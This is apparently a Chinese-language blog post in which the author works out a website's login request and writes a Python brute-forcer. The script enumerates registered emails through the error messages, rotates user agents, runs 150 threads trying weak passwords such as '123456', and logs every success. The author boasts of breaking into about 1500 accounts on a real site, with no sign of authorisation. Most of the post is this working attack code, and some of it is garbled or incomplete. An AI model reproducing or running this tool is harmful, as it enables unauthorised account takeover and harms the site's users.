抓取登陸信息。
使用Post Form表單的形式,進行用戶名和密碼的提交。接下來我們看提交的用戶名和密碼。
查看網站的腳本,發現密碼是先在本地做MD5處理之後,才發送到服務器的。
到了這一步,我們也就初步知道如何對該網站進行暴力破解了。
構造用於判斷密碼郵箱是否存在
user_agent = [ 'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30', 'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C)', 'Opera/9.80 (Windows NT 5.1; U; zh-cn) Presto/2.9.168 Version/11.50', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C)']def save_pwd(user, pwd,desc): with open("resut.txt","a+") as f: f.write('user:'+ user + ' pwd:' + pwd + " desc:" + desc + '\n')def user_test(username,password): resp = "" result = "" url = "http://www.k*.htm" pwd = password user= username md = hashlib.md5() md.update(pwd) password = md.hexdigest() data = {'email':username,'password':password} # 設置網頁編碼格式,解碼獲取到的中文字符 encoding = "gb18030" # 構造http請求頭,設置user-agent header = { "User-Agent": random.choice(user_agent), 'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 'X-Requested-With':'XMLHttpRequest' } try: requests.adapters.DEFAULT_RETRIES = 5 resp = requests.post(url, data=data, headers=header, timeout=335) except requests.exceptions.ReadTimeout: print("1") time.sleep(10) resp = requests.post(url, data=data, headers=header, timeout=335) except requests.exceptions.Timeout: print("2") time.sleep(10) resp = requests.post(url, data=data, headers=header, timeout=335) except requests.exceptions.ConnectionError: print("3") time.sleep(10) resp = requests.post(url, data=data, headers=header, timeout=335) except socket.error: time.sleep(10) resp = requests.post(url, data=data, headers=header, timeout=335) except BaseException as e: print(e) time.sleep(10) resp = requests.post(url, data=data, headers=header, timeout=335) resp.keep_alive = False #print(resp.content) try: result = resp.content json = resp.json() print('郵箱:%s ,result:%s \n ' % (username,result)) if (json['message'].find('不存在') > -1): #print('郵箱:%s 為空' % username ) return False else: print('郵箱: %s 存在' % username) save_pwd(username, password, json['message']) return True except BaseException as e: print("發送錯誤 e: %s result:%s response code:%d" % (e, result, resp.status_code ))好了,我們獲取到郵箱之後,就是要判斷密碼是否正確了,由於大部分人網站登陸,還是使用弱密碼,我們可以到網上找一下相關的字典庫,就可以直接破解了。
判斷密碼是否正確,我們只需要在判斷郵箱存在之後,再加一個判斷即可。
if(json['message'].find('錯誤') > -1): print("郵箱: %s 密碼: %s ,密碼錯誤!" % (username,pwd)) return False else: print('郵箱: %s 密碼: %s ,登陸成功!' % (username, pwd))由於用戶和密碼驗證較多,單一線程工作需要較長的時間,因此我們需要用上多線程,縮短密碼破解時間。
def thread_bru(): # 破解子線程函數 #while not user_end_judge():pwd_queue.empty() while not user_end_judge(): try: pwd = ‘123456’ user = get_user_nbr() #print pwd_test #if user_test(user, pwd_test): if user_test(user, pwd): result = pwd print ('破解 %s 成功,密碼為: %s' % (user, pwd)) break except BaseException as e: print("破解子線程錯誤: %s" % e)def brute(threads): for i in range(threads): t = threading.Thread(target=thread_bru) t.start() print('破解線程-->%s 啟動' % t.ident) while (not user_end_judge()): # 剩餘口令集判斷 print('\r 進度: 當前值 %d' % pwd_queue.qsize()) time.sleep(2) #print('\n破解完畢')if __name__ == "__main__": brute(150)好了,初步編寫完成。我們先刷完一部電影過來看看最終結果吧。
居然測試成功1500左右的郵箱,還有很多許多人是用非常簡單的密碼的。
分享到:
閱讀更多 繁華落盡and曲終人散 的文章
